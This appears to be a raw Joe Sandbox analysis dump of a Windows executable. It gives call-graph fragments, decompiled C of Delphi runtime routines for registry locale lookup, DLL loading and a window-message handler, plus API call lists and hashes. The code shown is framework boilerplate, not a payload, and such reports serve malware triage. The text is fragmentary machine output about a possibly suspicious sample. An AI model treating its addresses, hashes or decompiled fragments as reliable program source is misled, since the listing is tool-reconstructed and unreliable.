38388->38390 38389->38390 38391 4045fa KiUserCallbackDispatcher 38389->38391 38390->38042 38391->38389 38392->38041 38393 41bd4e 38394 41bd5f 38393->38394 38397 4348a8 38394->38397 38398 4348d3 38397->38398 38399 43497d 38397->38399 38402 4348e3 SendMessageA 38398->38402 38400 4049c0 12 API calls 38399->38400 38401 41bd6c 38400->38401 38403 434901 38402->38403 38404 4348ef 38402->38404 38407 434912 SendMessageA 38403->38407 38405 404ccc 12 API calls 38404->38405 38406 4348ff 38405->38406 38410 434959 SendMessageA 38406->38410 38407->38399 38408 43491e 38407->38408 38409 43492e SendMessageA 38408->38409 38409->38399 38411 434938 38409->38411 38413 434967 38410->38413 38412 404ccc 12 API calls 38411->38412 
38412->38406 38414 434977 SendMessageA 38413->38414 38414->38399 38415 445e34 38418 42c5e4 38415->38418 38419 42c614 38418->38419 38420 42c5f4 38418->38420 38423 42c64b 38419->38423 38424 42c645 GetSystemMetrics 38419->38424 38425 42c4fc 38420->38425 38424->38423 38429 42c512 38425->38429 38426 4049c0 12 API calls 38427 42c5ba KiUserCallbackDispatcher 38426->38427 38427->38423 38428 42c585 38428->38426 38429->38428 38430 42c56d 38429->38430 38431 42c4fc 12 API calls 38429->38431 38432 42c575 GetProcAddress 38430->38432 38433 42c557 38431->38433 38432->38428 38433->38430 38434 42c565 38433->38434 38435 4049c0 12 API calls 38434->38435 38435->38430 38436 437d70 SetWindowLongA GetWindowLongA 38437 437daf GetWindowLongA 38436->38437 38438 437dcd SetPropA SetPropA 38436->38438 38437->38438 38439 437dbe SetWindowLongA 38437->38439 38442 422ba4 38438->38442 38439->38438 38447 459934 38442->38447 38529 43f118 38442->38529 38545 43eec0 38442->38545 38443 422bba 38448 45999c 38447->38448 38454 45996a 38447->38454 38550 4597e8 38448->38550 38450 4599a7 38452 459a65 38450->38452 38453 4599b7 38450->38453 38451 41ac6c 13 API calls 38451->38454 38455 459a6c 38452->38455 38456 459abb 38452->38456 38457 459f03 38453->38457 38458 4599bd 38453->38458 38454->38448 38454->38451 38525 45998b 38454->38525 38460 459a72 38455->38460 38492 459ddb 38455->38492 38461 459f1d 38456->38461 38462 459ac8 38456->38462 38469 459a49 38456->38469 38571 45aae4 13 API calls 38457->38571 38465 459a31 38458->38465 38466 459a4e 38458->38466 38458->38469 38458->38525 38463 459aa2 38460->38463 38464 459a79 38460->38464 38474 459f26 38461->38474 38475 459f3e 38461->38475 38467 459ec4 IsIconic 38462->38467 38468 459ad3 38462->38468 38463->38469 38486 459db9 38463->38486 38463->38525 38483 459a86 38464->38483 38484 459afd 38464->38484 38464->38525 38470 459fa7 38465->38470 38471 459a37 38465->38471 38472 459a57 38466->38472 38473 459b93 38466->38473 38476 459ed8 GetFocus 38467->38476 38467->38525 38468->38457 
38468->38469 38469->38525 38557 4598ac NtdllDefWindowProc_A 38469->38557 38576 4598ac NtdllDefWindowProc_A 38470->38576 38477 459f81 38471->38477 38478 459a40 38471->38478 38472->38469 38479 459ce4 38472->38479 38480 45a038 19 API calls 38473->38480 38572 45a5a4 13 API calls 38474->38572 38573 45a600 14 API calls 38475->38573 38489 459ee9 38476->38489 38476->38525 38574 459840 12 API calls 38477->38574 38478->38469 38490 459bc7 38478->38490 38501 459d12 38479->38501 38479->38525 38480->38525 38483->38469 38493 459c9c SendMessageA 38483->38493 38487 459b0f 38484->38487 38488 459b18 38484->38488 38565 45a47c IsWindowEnabled 38486->38565 38495 459b25 38487->38495 38496 459b16 38487->38496 38558 45a054 27 API calls 38488->38558 38570 451750 GetCurrentThreadId EnumThreadWindows 38489->38570 38561 4598ac NtdllDefWindowProc_A 38490->38561 38505 459e01 IsWindowEnabled 38492->38505 38492->38525 38493->38525 38559 45a104 24 API calls 38495->38559 38560 4598ac NtdllDefWindowProc_A 38496->38560 38564 40edc4 SetErrorMode LoadLibraryA 38501->38564 38503 459ef0 38509 459ef8 SetFocus 38503->38509 38503->38525 38504 459bcd 38510 459c0c 38504->38510 38511 459bea 38504->38511 38512 459e0f 38505->38512 38505->38525 38506 459f9e 38575 4598ac NtdllDefWindowProc_A 38506->38575 38509->38525 38563 45973c 19 API calls 38510->38563 38562 45974c 14 API calls 38511->38562 38521 459e16 IsWindowVisible 38512->38521 38514 459d21 38517 459d70 GetLastError 38514->38517 38518 459d30 GetProcAddress 38514->38518 38517->38525 38522 459d58 38518->38522 38518->38525 38519 459bf2 PostMessageA 38519->38525 38520 459c14 PostMessageA 38520->38525 38523 459e24 GetFocus 38521->38523 38521->38525 38522->38525 38566 441704 38523->38566 38525->38443 38526 459e39 SetFocus 38568 43c130 38526->38568 38530 43f143 38529->38530 38531 43f12b 38529->38531 38534 43f13e 38530->38534 38589 43f084 15 API calls 38530->38589 38532 43f19d 38531->38532 38538 43f12d 38531->38538 38533 43c1fc 67 API calls 38532->38533 38540 43f1a6 

                                                    Control-flow Graph

                                                    C-Code - Quality: 65%
                                                    			E004061D0(intOrPtr __eax) {
                                                    				intOrPtr _v8;
                                                    				void* _v12;
                                                    				char _v15;
                                                    				char _v17;
                                                    				char _v18;
                                                    				char _v22;
                                                    				int _v28;
                                                    				char _v289;
                                                    				long _t44;
                                                    				long _t61;
                                                    				long _t63;
                                                    				CHAR* _t70;
                                                    				CHAR* _t72;
                                                    				struct HINSTANCE__* _t78;
                                                    				struct HINSTANCE__* _t84;
                                                    				char* _t94;
                                                    				void* _t95;
                                                    				intOrPtr _t99;
                                                    				struct HINSTANCE__* _t107;
                                                    				void* _t110;
                                                    				void* _t112;
                                                    				intOrPtr _t113;
                                                    
                                                    				_t110 = _t112;
                                                    				_t113 = _t112 + 0xfffffee0;
                                                    				_v8 = __eax;
                                                    				GetModuleFileNameA(0,  &_v289, 0x105);
                                                    				_v22 = 0;
                                                    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                    				if(_t44 == 0) {
                                                    					L3:
                                                    					_push(_t110);
                                                    					_push(0x4062d5);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t113;
                                                    					_v28 = 5;
                                                    					E00406018( &_v289, 0x105);
                                                    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
                                                    						_v22 = 0;
                                                    					}
                                                    					_v18 = 0;
                                                    					_pop(_t99);
                                                    					 *[fs:eax] = _t99;
                                                    					_push(E004062DC);
                                                    					return RegCloseKey(_v12);
                                                    				} else {
                                                    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                    					if(_t61 == 0) {
                                                    						goto L3;
                                                    					} else {
                                                    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                    						if(_t63 != 0) {
                                                    							_push(0x105);
                                                    							_push(_v8);
                                                    							_push( &_v289);
                                                    							L0040131C();
                                                    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                                    							_t107 = 0;
                                                    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                    								_t70 =  &_v289;
                                                    								_push(_t70);
                                                    								L00401324();
                                                    								_t94 = _t70 +  &_v289;
                                                    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                                    									_t94 = _t94 - 1;
                                                    								}
                                                    								_t72 =  &_v289;
                                                    								if(_t94 != _t72) {
                                                    									_t95 = _t94 + 1;
                                                    									if(_v22 != 0) {
                                                    										_push(0x105 - _t95 - _t72);
                                                    										_push( &_v22);
                                                    										_push(_t95);
                                                    										L0040131C();
                                                    										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                                    									}
                                                    									if(_t107 == 0 && _v17 != 0) {
                                                    										_push(0x105 - _t95 -  &_v289);
                                                    										_push( &_v17);
                                                    										_push(_t95);
                                                    										L0040131C();
                                                    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                    										_t107 = _t78;
                                                    										if(_t107 == 0) {
                                                    											_v15 = 0;
                                                    											_push(0x105 - _t95 -  &_v289);
                                                    											_push( &_v17);
                                                    											_push(_t95);
                                                    											L0040131C();
                                                    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                    											_t107 = _t84;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    							return _t107;
                                                    						} else {
                                                    							goto L3;
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                    • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                    • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                    • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                    • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                    • API String ID: 1759228003-2375825460
                                                    • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                    • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                    • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                    • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph for E00459934 (entry block 459934-459968; node and edge list not reproduced)
                                                    C-Code - Quality: 94%
                                                    			E00459934(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                                    				struct HWND__* _v8;
                                                    				struct HWND__* _v12;
                                                    				void* __ebx;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed int _t161;
                                                    				struct HWND__* _t162;
                                                    				struct HWND__* _t163;
                                                    				void* _t166;
                                                    				struct HWND__* _t176;
                                                    				struct HWND__* _t185;
                                                    				struct HWND__* _t188;
                                                    				struct HWND__* _t189;
                                                    				struct HWND__* _t191;
                                                    				struct HWND__* _t197;
                                                    				struct HWND__* _t199;
                                                    				struct HWND__* _t202;
                                                    				struct HWND__* _t205;
                                                    				struct HWND__* _t206;
                                                    				struct HWND__* _t216;
                                                    				struct HWND__* _t217;
                                                    				struct HWND__* _t222;
                                                    				struct HWND__* _t224;
                                                    				struct HWND__* _t227;
                                                    				struct HWND__* _t231;
                                                    				struct HWND__* _t239;
                                                    				struct HWND__* _t247;
                                                    				struct HWND__* _t250;
                                                    				struct HWND__* _t254;
                                                    				struct HWND__* _t256;
                                                    				struct HWND__* _t257;
                                                    				struct HWND__* _t269;
                                                    				intOrPtr _t272;
                                                    				struct HWND__* _t275;
                                                    				intOrPtr* _t276;
                                                    				struct HWND__* _t284;
                                                    				struct HWND__* _t286;
                                                    				struct HWND__* _t297;
                                                    				void* _t306;
                                                    				signed int _t308;
                                                    				struct HWND__* _t314;
                                                    				struct HWND__* _t315;
                                                    				struct HWND__* _t316;
                                                    				void* _t317;
                                                    				intOrPtr _t340;
                                                    				struct HWND__* _t344;
                                                    				intOrPtr _t366;
                                                    				void* _t370;
                                                    				struct HWND__* _t375;
                                                    				void* _t376;
                                                    				void* _t377;
                                                    				intOrPtr _t378;
                                                    
                                                    				_t317 = __ecx;
                                                    				_push(_t370);
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_push(_t377);
                                                    				_push(0x459fee);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t378;
                                                    				 *(_v12 + 0xc) = 0;
                                                    				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                                                    				if(_t306 < 0) {
                                                    					L5:
                                                    					E004597E8(_v8, _t317, _v12);
                                                    					_t308 =  *_v12;
                                                    					_t161 = _t308;
                                                    					__eflags = _t161 - 0x53;
                                                    					if(__eflags > 0) {
                                                    						__eflags = _t161 - 0xb017;
                                                    						if(__eflags > 0) {
                                                    							__eflags = _t161 - 0xb020;
                                                    							if(__eflags > 0) {
                                                    								_t162 = _t161 - 0xb031;
                                                    								__eflags = _t162;
                                                    								if(_t162 == 0) {
                                                    									_t163 = _v12;
                                                    									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                                    									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                                    										 *(_v8 + 0xb0) =  *(_v12 + 8);
                                                    									} else {
                                                    										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                                                    									}
                                                    									L102:
                                                    									_t166 = 0;
                                                    									_pop(_t340);
                                                    									 *[fs:eax] = _t340;
                                                    									goto L103;
                                                    								}
                                                    								__eflags = _t162 + 0xfffffff2 - 2;
                                                    								if(_t162 + 0xfffffff2 - 2 < 0) {
                                                    									 *(_v12 + 0xc) = L0045BA10(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
                                                    								} else {
                                                    									L101:
                                                    									E004598AC(_t377); // executed
                                                    								}
                                                    								goto L102;
                                                    							}
                                                    							if(__eflags == 0) {
                                                    								_t176 = _v12;
                                                    								__eflags =  *(_t176 + 4);
                                                    								if( *(_t176 + 4) != 0) {
                                                    									E0045A600(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                    								} else {
                                                    									E0045A5A4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                    								}
                                                    								goto L102;
                                                    							}
                                                    							_t185 = _t161 - 0xb01a;
                                                    							__eflags = _t185;
                                                    							if(_t185 == 0) {
                                                    								_t188 = IsIconic( *(_v8 + 0x30));
                                                    								__eflags = _t188;
                                                    								if(_t188 == 0) {
                                                    									_t189 = GetFocus();
                                                    									_t344 = _v8;
                                                    									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
                                                    									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
                                                    										_t191 = E00451750(0);
                                                    										__eflags = _t191;
                                                    										if(_t191 != 0) {
                                                    											SetFocus(_t191);
                                                    										}
                                                    									}
                                                    								}
                                                    								goto L102;
                                                    							}
                                                    							__eflags = _t185 == 5;
                                                    							if(_t185 == 5) {
                                                    								L89:
                                                    								E0045AAE4(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                                    								goto L102;
                                                    							} else {
                                                    								goto L101;
                                                    							}
                                                    						}
                                                    						if(__eflags == 0) {
                                                    							_t197 =  *(_v8 + 0x44);
                                                    							__eflags = _t197;
                                                    							if(_t197 != 0) {
                                                    								_t372 = _t197;
                                                    								_t199 = E00441704(_t197);
                                                    								__eflags = _t199;
                                                    								if(_t199 != 0) {
                                                    									_t202 = IsWindowEnabled(E00441704(_t372));
                                                    									__eflags = _t202;
                                                    									if(_t202 != 0) {
                                                    										_t205 = IsWindowVisible(E00441704(_t372));
                                                    										__eflags = _t205;
                                                    										if(_t205 != 0) {
                                                    											 *0x49be6c = 0;
                                                    											_t206 = GetFocus();
                                                    											SetFocus(E00441704(_t372));
                                                    											E0043C130(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                                    											SetFocus(_t206);
                                                    											 *0x49be6c = 1;
                                                    											 *(_v12 + 0xc) = 1;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    							goto L102;
                                                    						}
                                                    						__eflags = _t161 - 0xb000;
                                                    						if(__eflags > 0) {
                                                    							_t216 = _t161 - 0xb001;
                                                    							__eflags = _t216;
                                                    							if(_t216 == 0) {
                                                    								_t217 = _v8;
                                                    								__eflags =  *((short*)(_t217 + 0x10a));
                                                    								if( *((short*)(_t217 + 0x10a)) != 0) {
                                                    									 *((intOrPtr*)(_v8 + 0x108))();
                                                    								}
                                                    								goto L102;
                                                    							}
                                                    							__eflags = _t216 == 0x15;
                                                    							if(_t216 == 0x15) {
                                                    								_t222 = E0045A47C(_v8, _t317, _v12);
                                                    								__eflags = _t222;
                                                    								if(_t222 != 0) {
                                                    									 *(_v12 + 0xc) = 1;
                                                    								}
                                                    								goto L102;
                                                    							} else {
                                                    								goto L101;
                                                    							}
                                                    						}
                                                    						if(__eflags == 0) {
                                                    							_t224 = _v8;
                                                    							__eflags =  *((short*)(_t224 + 0x112));
                                                    							if( *((short*)(_t224 + 0x112)) != 0) {
                                                    								 *((intOrPtr*)(_v8 + 0x110))();
                                                    							}
                                                    							goto L102;
                                                    						}
                                                    						_t227 = _t161 - 0x112;
                                                    						__eflags = _t227;
                                                    						if(_t227 == 0) {
                                                    							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                                    							__eflags = _t231;
                                                    							if(_t231 == 0) {
                                                    								E0045A054(_v8);
                                                    							} else {
                                                    								__eflags = _t231 == 0x100;
                                                    								if(_t231 == 0x100) {
                                                    									E0045A104(_v8);
                                                    								} else {
                                                    									E004598AC(_t377);
                                                    								}
                                                    							}
                                                    							goto L102;
                                                    						}
                                                    						_t239 = _t227 + 0xffffffe0 - 7;
                                                    						__eflags = _t239;
                                                    						if(_t239 < 0) {
                                                    							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                                    							goto L102;
                                                    						}
                                                    						__eflags = _t239 == 0x1e1;
                                                    						if(_t239 == 0x1e1) {
                                                    							_t247 = E004329D8(E004328F8());
                                                    							__eflags = _t247;
                                                    							if(_t247 != 0) {
                                                    								E00432A34(E004328F8());
                                                    							}
                                                    							goto L102;
                                                    						} else {
                                                    							goto L101;
                                                    						}
                                                    					}
                                                    					if(__eflags == 0) {
                                                    						goto L89;
                                                    					}
                                                    					__eflags = _t161 - 0x16;
                                                    					if(__eflags > 0) {
                                                    						__eflags = _t161 - 0x1d;
                                                    						if(__eflags > 0) {
                                                    							_t250 = _t161 - 0x37;
                                                    							__eflags = _t250;
                                                    							if(_t250 == 0) {
                                                    								 *(_v12 + 0xc) = E0045A038(_v8);
                                                    								goto L102;
                                                    							}
                                                    							__eflags = _t250 == 0x13;
                                                    							if(_t250 == 0x13) {
                                                    								_t254 = _v12;
                                                    								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
                                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
                                                    									_t256 = _v8;
                                                    									__eflags =  *((char*)(_t256 + 0x9e));
                                                    									if( *((char*)(_t256 + 0x9e)) != 0) {
                                                    										_t257 = _v8;
                                                    										__eflags =  *(_t257 + 0xa0);
                                                    										if( *(_t257 + 0xa0) != 0) {
                                                    											 *(_v12 + 0xc) = 0;
                                                    										} else {
                                                    											_t314 = E0040EDC4("vcltest3.dll", _t308, 0x8000);
                                                    											 *(_v8 + 0xa0) = _t314;
                                                    											__eflags = _t314;
                                                    											if(_t314 == 0) {
                                                    												 *(_v12 + 0xc) = GetLastError();
                                                    												 *(_v8 + 0xa0) = 0;
                                                    											} else {
                                                    												 *(_v12 + 0xc) = 0;
                                                    												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                                                    												_t315 = _t375;
                                                    												__eflags = _t375;
                                                    												if(_t375 != 0) {
                                                    													_t269 =  *(_v12 + 8);
                                                    													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    								goto L102;
                                                    							} else {
                                                    								goto L101;
                                                    							}
                                                    						}
                                                    						if(__eflags == 0) {
                                                    							_t272 =  *0x49ebbc; // 0x0
                                                    							E00458DEC(_t272);
                                                    							E004598AC(_t377);
                                                    							goto L102;
                                                    						}
                                                    						_t275 = _t161 - 0x1a;
                                                    						__eflags = _t275;
                                                    						if(_t275 == 0) {
                                                    							_t276 =  *0x49ddb0; // 0x49eb18
                                                    							L00445ED0( *_t276, _t317,  *(_v12 + 4));
                                                    							E00459840(_v8, _t308, _t317, _v12, _t370);
                                                    							E004598AC(_t377);
                                                    							goto L102;
                                                    						}
                                                    						__eflags = _t275 == 2;
                                                    						if(_t275 == 2) {
                                                    							E004598AC(_t377);
                                                    							_t284 = _v12;
                                                    							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
                                                    							asm("sbb eax, eax");
                                                    							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
                                                    							_t286 = _v12;
                                                    							__eflags =  *(_t286 + 4);
                                                    							if( *(_t286 + 4) == 0) {
                                                    								E0045973C();
                                                    								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                                                    							} else {
                                                    								E0045974C(_v8);
                                                    								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                                                    							}
                                                    							goto L102;
                                                    						} else {
                                                    							goto L101;
                                                    						}
                                                    					}
                                                    					if(__eflags == 0) {
                                                    						_t297 = _v12;
                                                    						__eflags =  *(_t297 + 4);
                                                    						if( *(_t297 + 4) != 0) {
                                                    							 *((char*)(_v8 + 0x9c)) = 1;
                                                    						}
                                                    						goto L102;
                                                    					}
                                                    					__eflags = _t161 - 0x14;
                                                    					if(_t161 > 0x14) {
                                                    						goto L101;
                                                    					}
                                                    					switch( *((intOrPtr*)(_t161 * 4 +  &M004599D8))) {
                                                    						case 0:
                                                    							0 = E004214B8(0, __ebx, __edi, __esi);
                                                    							goto L102;
                                                    						case 1:
                                                    							goto L101;
                                                    						case 2:
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0xb01a);
                                                    							_v8 =  *(_v8 + 0x30);
                                                    							_push( *(_v8 + 0x30));
                                                    							L00407848();
                                                    							__eax = E004598AC(__ebp);
                                                    							goto L102;
                                                    						case 3:
                                                    							__eax = _v12;
                                                    							__eflags =  *(__eax + 4);
                                                    							if( *(__eax + 4) == 0) {
                                                    								__eax = E004598AC(__ebp);
                                                    								__eax = _v8;
                                                    								__eflags =  *(__eax + 0xac);
                                                    								if( *(__eax + 0xac) == 0) {
                                                    									__eax = _v8;
                                                    									__eax =  *(_v8 + 0x30);
                                                    									__eax = E00451600( *(_v8 + 0x30), __ebx, __edi, __esi);
                                                    									__edx = _v8;
                                                    									 *(_v8 + 0xac) = __eax;
                                                    								}
                                                    								_v8 = L00459744();
                                                    							} else {
                                                    								_v8 = E0045974C(_v8);
                                                    								__eax = _v8;
                                                    								__eax =  *(_v8 + 0xac);
                                                    								__eflags = __eax;
                                                    								if(__eax != 0) {
                                                    									__eax = _v8;
                                                    									__edx = 0;
                                                    									__eflags = 0;
                                                    									 *(_v8 + 0xac) = 0;
                                                    								}
                                                    								__eax = E004598AC(__ebp);
                                                    							}
                                                    							goto L102;
                                                    						case 4:
                                                    							__eax = _v8;
                                                    							__eax =  *(_v8 + 0x30);
                                                    							_push(__eax);
                                                    							L004077A8();
                                                    							__eflags = __eax;
                                                    							if(__eax == 0) {
                                                    								__eax = E004598AC(__ebp);
                                                    							} else {
                                                    								__eax = L004598E8(__ebp);
                                                    							}
                                                    							goto L102;
                                                    						case 5:
                                                    							__eax = _v8;
                                                    							__eax =  *(_v8 + 0x44);
                                                    							__eflags = __eax;
                                                    							if(__eax != 0) {
                                                    								__eax = E00456FEC(__eax, __ecx);
                                                    							}
                                                    							goto L102;
                                                    						case 6:
                                                    							__eax = _v12;
                                                    							 *_v12 = 0x27;
                                                    							__eax = E004598AC(__ebp);
                                                    							goto L102;
                                                    					}
                                                    				} else {
                                                    					_t316 = _t306 + 1;
                                                    					_t376 = 0;
                                                    					L2:
                                                    					L2:
                                                    					if( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						_t166 = 0;
                                                    						_pop(_t366);
                                                    						 *[fs:eax] = _t366;
                                                    					}
                                                    					L103:
                                                    					return _t166;
                                                    					L4:
                                                    					_t376 = _t376 + 1;
                                                    					_t316 = _t316 - 1;
                                                    					__eflags = _t316;
                                                    					if(_t316 != 0) {
                                                    						goto L2;
                                                    					}
                                                    					goto L5;
                                                    				}
                                                    			}
                                                    0x00459934
                                                    0x0045993b
                                                    0x0045993d
                                                    0x00459940
                                                    0x00459945
                                                    0x00459946
                                                    0x0045994b
                                                    0x0045994e
                                                    0x00459956
                                                    0x00459965
                                                    0x00459968
                                                    0x0045999c
                                                    0x004599a2
                                                    0x004599aa
                                                    0x004599ac
                                                    0x004599ae
                                                    0x004599b1
                                                    0x00459a65
                                                    0x00459a6a
                                                    0x00459abb
                                                    0x00459ac0
                                                    0x00459ae1
                                                    0x00459ae1
                                                    0x00459ae6
                                                    0x00459f56
                                                    0x00459f59
                                                    0x00459f5d
                                                    0x00459f79
                                                    0x00459f5f
                                                    0x00459f6b
                                                    0x00459f6b
                                                    0x00459fe4
                                                    0x00459fe4
                                                    0x00459fe6
                                                    0x00459fe9
                                                    0x00000000
                                                    0x00459fe9
                                                    0x00459aef
                                                    0x00459af2
                                                    0x00459db1
                                                    0x00459af8
                                                    0x00459fdd
                                                    0x00459fde
                                                    0x00459fe3
                                                    0x00000000
                                                    0x00459af2
                                                    0x00459ac2
                                                    0x00459f1d
                                                    0x00459f20
                                                    0x00459f24
                                                    0x00459f4c
                                                    0x00459f26
                                                    0x00459f34
                                                    0x00459f34
                                                    0x00000000
                                                    0x00459f24
                                                    0x00459ac8
                                                    0x00459ac8
                                                    0x00459acd
                                                    0x00459ecb
                                                    0x00459ed0
                                                    0x00459ed2
                                                    0x00459ed8
                                                    0x00459edd
                                                    0x00459ee0
                                                    0x00459ee3
                                                    0x00459eeb
                                                    0x00459ef0
                                                    0x00459ef2
                                                    0x00459ef9
                                                    0x00459ef9
                                                    0x00459ef2
                                                    0x00459ee3
                                                    0x00000000
                                                    0x00459ed2
                                                    0x00459ad3
                                                    0x00459ad6
                                                    0x00459f03
                                                    0x00459f13
                                                    0x00000000
                                                    0x00459adc
                                                    0x00000000
                                                    Instruction address column (detached from the preceding decompiled listing during extraction): addresses span 0x0045996a to 0x0045a009; entries of 0x00000000 mark lines with no mapped instruction.

                                                    Strings
                                                    Memory Dump Source
